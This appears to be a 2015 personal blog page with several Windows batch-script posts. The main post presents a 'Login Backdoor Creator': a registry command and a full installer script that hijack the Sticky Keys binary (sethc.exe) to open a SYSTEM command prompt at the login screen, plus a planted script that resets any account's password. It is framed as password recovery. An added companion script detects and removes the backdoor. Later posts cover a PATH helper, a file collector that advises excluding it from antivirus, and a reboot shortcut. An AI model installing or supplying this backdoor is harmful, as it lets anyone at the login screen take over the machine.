Saturday, February 21, 2015

Windows Login Backdoor Creator V2.0

Note: This is a revision of the original post 'Creating backdoor at Windows login to reset password after losing it.' found here.

Over the years I have had many people ask me how to get into their computer after they have forgotten their password. There are a few ways to do this, either with a bootable CD or USB stick running a 3rd-party application, but to be honest this is very unsafe: anyone who gets hold of the CD can break into a computer, and at the same time you or anyone else using such software can cause users or admins to lose data.

The only really safe way to do it is through your command prompt, but without knowing your password to get into the profile and use the console, you are screwed. Recently I have discovered a way to access your command prompt from the Windows login screen by adding a value to the registry. You could create a registry file (.reg) to do this, but today we will just add it via the command prompt:


1. You must open your cmd (command prompt) as administrator, so you can't open it from Run. Go to your start screen, type "cmd" in the search bar and when you see it, right click on it and select "Run as administrator".

2. Type the code below into the prompt:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
Triple click on the above code to select it all, then copy and paste it into your command prompt and hit "ENTER".

You now have access to the command prompt at the Windows login screen.

Gain access by either:

  • Pressing SHIFT+ALT+PRTSC (Print Screen) or;
  • Hitting the SHIFT key 5 times in a row (good ol' Sticky Keys).



If you or anyone else on your Windows OS ever loses their password (or you just want to do anything else that you can do from the prompt) you can do it without logging in (be careful though!).

3. When you need to change your password from the prompt, type:
net user username password
Where username is, of course, your username and password is your new password.

EXAMPLE:
net user bob apples
would change user bob's password to apples, etc.

If your name has a space in it you must wrap quotation marks around the name, as a space separates arguments. You must enter it like:

net user "bob for" apples


4. Login with your new password!



Downloads:

New version 2.0 is 90% re-written with 32 and 64 bit versions to accommodate x86 issues.

Version Info
  • V1.0 - Original, batch script only. Bugs: batch quote issue in paths; installs to the wrong path on x86 systems with SysWOW. Bug fixes: none.
  • V2.0 - New re-write, 32 and 64 bit executables. Bugs: no known bugs. Bug fixes: fixed the batch quotes in paths issue; fixed the wrong install locations issue.

Features
  • Checks for the registry value and the script file and either installs the backdoor or fixes any part that may be broken.
  • Now runs great on Windows XP/Vista/7/8, 32 and 64 bit.
I have created a batch file to automate this process so you don't have to do half of this. You can either download it here (outdated V1.0 script, kept for archives) or, if you are scared of downloading files, you can just copy and paste the text below into a batch file you create.

  • Right click on your desktop and select New > TXT File.
  • Rename the file from "New Text Document.txt" to "whateveryouwant.bat" (if you can't see the extension, go into Folder Options and uncheck "Hide extensions of known applications" or something like that).
  • Once it's a .bat file, right click on it, select "Edit", paste the code below into it and save the file.
  • Right click on the .bat file you have created and select "Run as administrator" and it will run.
Code to paste in your batch file:
@echo off
Title Windows Login Backdoor Creator
color 0A
:: Use backslashes here: del treats a forward slash as a switch, even inside quotes.
set "_bscript=%windir%\System32\backdoor.cmd"
cls
mode 54,4
echo(
echo Checking to see if script or registry value exist...
echo(
call :to
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger>nul
cls

if [%errorlevel%]==[1] if not exist "%_bscript%" (
call :notFound
cls
call :howTo
call :md
goto :eof
)

if [%errorlevel%]==[0] if not exist "%_bscript%" (
mode 49,5
echo(
echo Registry value exists, but the script does not.
echo Writing script file now...
echo(
call :to
call :writeScript
cls
call :howTo
call :md
goto :eof
)

if [%errorlevel%]==[1] if exist "%_bscript%" (
mode 49,5
echo(
echo Script exists, but the registry value does not.
echo Writing registry value now...
echo(
call :to
call :writeReg
cls
call :howTo
call :md
goto :eof
)
mode 48,5
echo(
echo Both the script and registry value were found,
echo no need to do anything.
echo(
pause
call :md
goto :eof

:notFound
mode 45,5
echo(
echo Backdoor was not found, writing both the
echo registry value and the script file....
echo(
call :to
call :writeBoth
cls
exit /b

:writeBoth
call :writeReg
call :writeScript
exit /b

:writeReg
echo(
echo Creating registry key....
echo(
call :to
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
exit /b

:writeScript
mode 55,4
echo(
echo Creating script^: %_bscript%...
echo(
call :to
if exist "%_bscript%" del "%_bscript%"
echo Creating backdoor.cmd file...
echo @echo off > %_bscript%
echo title Create New User Password >> %_bscript%
echo echo Enter username to reset your password: >> %_bscript%
echo set "name=" >> %_bscript%
echo set "pass=" >> %_bscript%
echo set /P name="Username:" >> %_bscript%
echo set /P pass="New Password:" >> %_bscript%
echo net user "%%name%%" "%%pass%%" >> %_bscript%
echo timeout /t 3 ^>NUL >> %_bscript%
echo exit >> %_bscript%
exit /b

:howTo
mode 36,10
echo To run:
echo(
echo At the login screen either press
echo shift+alt+printscreen (or prtsc)
echo or hit shift 5 times. This will
echo bring up the command prompt. At
echo the prompt type "backdoor" and
echo follow the instructions.
echo(
pause
cls
exit /b

:to
timeout /t 3 >nul
exit /b

:md
color 0F
mode 80,25
exit /b

New icon I made for it: [image: green-backdoor_zps376b76e9.png]

Once it starts it will enter the registry value as provided above to create the access to the command prompt at Windows login, and it will also create a batch file in your System32 folder called "backdoor.cmd" which starts you through an automated, easy process to change your password, so there's no need to type the commands yourself; just run the backdoor file:

  • Run this batch file from the command prompt by typing "backdoor" or "backdoor.cmd" and hit "Enter".
  • It will easily guide you through the process of changing your password in just a couple of steps.
Again, login and enjoy!!!
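The installer above checks and repairs the backdoor but has no way to take it out again, and anyone who can reach the login screen gets the same prompt, so here is an added companion script (mine, not part of the original post or the download) that reports whether the sethc.exe Debugger value and backdoor.cmd are present and, when run with /remove, deletes both. The script name and the /remove switch are my own choices.

```batch
@echo off
:: backdoor-check.cmd (added example, not from the original post)
:: Reports whether the sethc.exe login backdoor installed by the script
:: above is present; run with /remove to delete both parts.
:: Must be run as administrator, like the installer.
setlocal
set "_ifeo=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
set "_bscript=%windir%\System32\backdoor.cmd"
set "_found=0"

reg query "%_ifeo%" /v Debugger >nul 2>nul
if not errorlevel 1 (
    set "_found=1"
    echo Debugger value is set for sethc.exe:
    for /f "tokens=1,2,*" %%A in ('reg query "%_ifeo%" /v Debugger') do (
        if /i "%%A"=="Debugger" echo     %%B  %%C
    )
)
if exist "%_bscript%" (
    set "_found=1"
    echo Helper script present: %_bscript%
)
if "%_found%"=="0" (
    echo No sethc.exe backdoor found.
    goto :eof
)
if /i not "%~1"=="/remove" (
    echo Run again with /remove to delete it.
    goto :eof
)

reg delete "%_ifeo%" /v Debugger /f >nul 2>nul
if exist "%_bscript%" del /q "%_bscript%"

:: Re-check rather than trusting the exit codes, so the message reflects
:: what is actually left in the registry and on disk.
reg query "%_ifeo%" /v Debugger >nul 2>nul
if not errorlevel 1 (
    echo Could not delete the Debugger value ^(run as administrator^).
) else if exist "%_bscript%" (
    echo Could not delete %_bscript%.
) else (
    echo Backdoor removed. The now-empty sethc.exe key is harmless and is left in place.
)
```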

Tuesday, February 17, 2015

WinBin V1.0

No matter what OS you use, if you use any console or command line interface you know that a script or executable cannot be run (or even found) unless it sits in a path the system searches, or the CLI is already in that file's directory.

In most Linux systems there is a user bin directory, usually located in $HOME/bin, where you can drop any of your user-installed programs or scripts and they can be run from the terminal just like any system command.

In Windows it's not so simple (although not so hard either), as any path searched by Windows must be declared in the PATH (%PATH%) variable.

The problem with Windows is that the preset paths are all in system folders and there can be some permission and security issues with some utilities you may use. So it is best to just stay away from system folders when possible. The way to do this is by adding a custom directory designated for the user and adding the directories location to the PATH variable.

For example, I create a directory C:\Bin and then add this location to the variable from cmd like this: setx /m PATH "%PATH%;C:\Bin". Now I can drop whatever scripts or executables I like into the C:\Bin folder and run them from anywhere on the computer, from cmd or any other CLI.

Automate

I do this on every Windows rig I have, so I have created a quick bat-to-exe script to automate this process with slight error checking. When started, WinBin V1.0 checks for a Bin folder and, if it exists, warns the user that the old folder should be moved or deleted to complete the process. If no folder is found it continues to add the new directory and adds its location to the PATH variable. It then checks to make sure the two functions were executed successfully; if so you can then use the system, and if not you either have too many characters in your PATH variable (usually mostly from installed software) or the folder wasn't created successfully.

Usage

After the system is installed successfully, just drop anything at all that can be run from a CLI into the C:\Bin folder and run it from the CLI!!! Very simple, quick and portable!
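An added script (mine, not the WinBin download) that does the same job as the setx command above but reads the machine PATH from the registry instead of %PATH%, which in a console is the machine value with the user value appended, and writes it back with reg add, which has no 1024-character limit and keeps the REG_EXPAND_SZ type so entries like %SystemRoot%\system32 still expand. The script name and variable names are my own choices.

```batch
@echo off
:: winbin-path.cmd (added example, not the WinBin script from the post)
:: Creates C:\Bin and appends it to the *machine* PATH without going
:: through setx. Must be run as administrator.
setlocal
set "_bin=C:\Bin"
set "_envkey=HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment"

:: Read the machine PATH directly. %PATH% in a console is the machine value
:: with the user value appended, so setx /m PATH "%PATH%;..." would copy the
:: user entries into the machine value every time it is run.
set "_syspath="
for /f "tokens=1,2,*" %%A in ('reg query "%_envkey%" /v Path') do (
    if /i "%%A"=="Path" set "_syspath=%%C"
)
if not defined _syspath (
    echo Could not read the machine PATH from the registry.
    exit /b 1
)

:: Already there? Compare with separators on both sides so C:\Bin does not
:: match C:\Binaries.
echo ;%_syspath%;| find /i ";%_bin%;" >nul && (
    echo %_bin% is already in the machine PATH.
    exit /b 0
)

if not exist "%_bin%\" mkdir "%_bin%"
if not exist "%_bin%\" (
    echo Could not create %_bin%.
    exit /b 1
)

:: REG_EXPAND_SZ keeps %SystemRoot%-style entries expandable; setx would
:: rewrite the value as plain REG_SZ and truncate it at 1024 characters.
reg add "%_envkey%" /v Path /t REG_EXPAND_SZ /d "%_syspath%;%_bin%" /f >nul
if errorlevel 1 (
    echo Could not update the machine PATH ^(run as administrator^).
    exit /b 1
)
echo %_bin% added to the machine PATH.
:: reg add does not broadcast the change the way setx does, so already-open
:: windows and anything started from Explorer see it after logging off and on.
echo Log off and back on for new consoles to pick it up.
```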

Download:

Icon I created: [image: WinBin_zpsae822e61.png]

Tuesday, February 10, 2015

Collector V1.1

Collector (V1.1 - Updated)

Like most people I am constantly downloading files and installing software to my computer and because, like most people, I am busy all the time I don't have as much time as I would like to keep my system clean and so I like to write scripts to automate as much as I can to give me more free time away from my computer.

Over the years after cleaning, optimizing and fixing countless computers I have learned that most files that eat up disk space that can comfortably be removed are usually media and installation files; things you download from the internet pretty much. Lots of archived files like zips, rars etc... can end up taking up lots of space and even the most organized of us end up having files spread throughout our system and half the time we forget about them.

Recently I wrote a script (Collector V1.1) to copy all files of specific passed extension types to a folder on the desktop so that I can easily analyze the total size of all said files. Doing this I also found files I had forgotten I even had, and for files I knew could be deleted I tracked down the source files and deleted them. I have converted my script to exe for easy portability and an administrative manifest.

Collector V1.1 is a command line utility (cli/clu) used by passing file extensions to it via a command line such as MS-DOS CMD.
E.g.:
collect.exe pdf txt log
will search your whole computer for all files with those extensions and then copy them to individual folders inside a folder on your desktop named "Collection". There is no limit to the number of passed extensions, as it shifts each one into %1 until [%1]==[].


Note: As with all bat-to-exe conversions this might come up as a false positive in your AV; just exclude it in your AV. The collect.exe file must be placed in a folder that is searched via %PATH%, such as C:\Windows\System32 or one of your own custom paths if you've added any. You can also just cd to the path of your stored collect.exe.

Version Info:

  • Version 1.0 - Initial release. No known bugs.
  • Version 1.1 - Added a log file with the locations of the original files.

Download:

Original Code:


@echo off
set "backd=%cd%"
title Collect Files
cls

:loop
mode 78,4
if [%1]==[] (
call :err
if exist "%mainf%" start "" explorer "%mainf%"
goto :eof
)

set "efile=%1"
set "mainf=%userprofile%\Desktop\Collection\"
set "wdir=%mainf%%efile%\"

:: /d also switches drive, in case the script was started from another drive.
cd /d C:\
echo(
echo Copying all "%efile%" files to %wdir%
echo(
for /r %%i in (*.%efile%) do (xcopy "%%i" "%wdir%" /q /y) >nul 2>nul
cls
cd /d "%backd%"
shift
goto :loop

:err
color FC
mode 38,4
cls
echo(
echo No more files to process...
echo(
pause
cls
color 0F
mode 80,25
title %backd%
exit /b


Friday, February 6, 2015

Reboot for Windows - Linux Alternative

Windows Reboot V1.0

A lot of us who use both Windows and Linux find Windows CLI commands lacking at times. Linux is best run from the command line (terminal) in my opinion, and almost everything you can do on a computer in Linux can and should be done via the terminal. One of the most annoying things I have found in Windows is the horrible way you have to reboot your computer from Windows CMD. In Linux it's as simple as typing 'reboot'.


In Windows, in order to reboot your computer from a command line you must type 'shutdown /r /t 0'. While this comes in handy for some things, it is annoying for normal everyday usage. I have created a bat-to-exe (for portability and easy use with administrative privileges) script to emulate this feature in Windows. Simply place reboot.exe in your C:\Windows\System32\ or any path in the Windows %PATH% variable and run it from the command line with 'reboot'.


The difference between Linux's 'reboot' and my Windows version is that an amount of time to wait before the reboot can be passed to it as you would any parameter:
reboot 30
will wait 30 seconds before the reboot.


This is available in 3 versions; the original cmd script, reboot with admin manifest and a reboot without admin manifest (rename to reboot) for use on public computers:

Original script:

@echo off

if [%1]==[] (
call :restart
) else (
set rt=%1
call :passed
)

goto :eof

:passed
shutdown /r /t %rt%
exit /b

:restart
shutdown /r /t 0
exit /b